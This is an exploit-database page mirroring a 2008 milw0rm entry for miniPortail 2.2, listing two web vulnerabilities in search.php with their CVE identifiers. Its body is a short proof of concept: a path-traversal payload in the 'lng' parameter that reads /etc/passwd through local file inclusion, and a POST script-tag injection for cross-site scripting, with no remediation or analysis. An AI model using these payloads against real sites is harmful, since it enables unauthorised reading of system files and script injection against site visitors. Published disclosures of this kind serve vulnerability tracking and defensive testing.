[] NeoSense
E X P L O I T S
title author type platform port cve id

miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2008-10-22 
date_updated:  
verified: 1 
codes: OSVDB-52147;CVE-2008-6168;OSVDB-52146;CVE-2008-6167 
tags: 
aliases:  
screenshot_url:  
application_url: 
/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------

   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00

   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)

*/

# milw0rm.com [2008-10-23]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.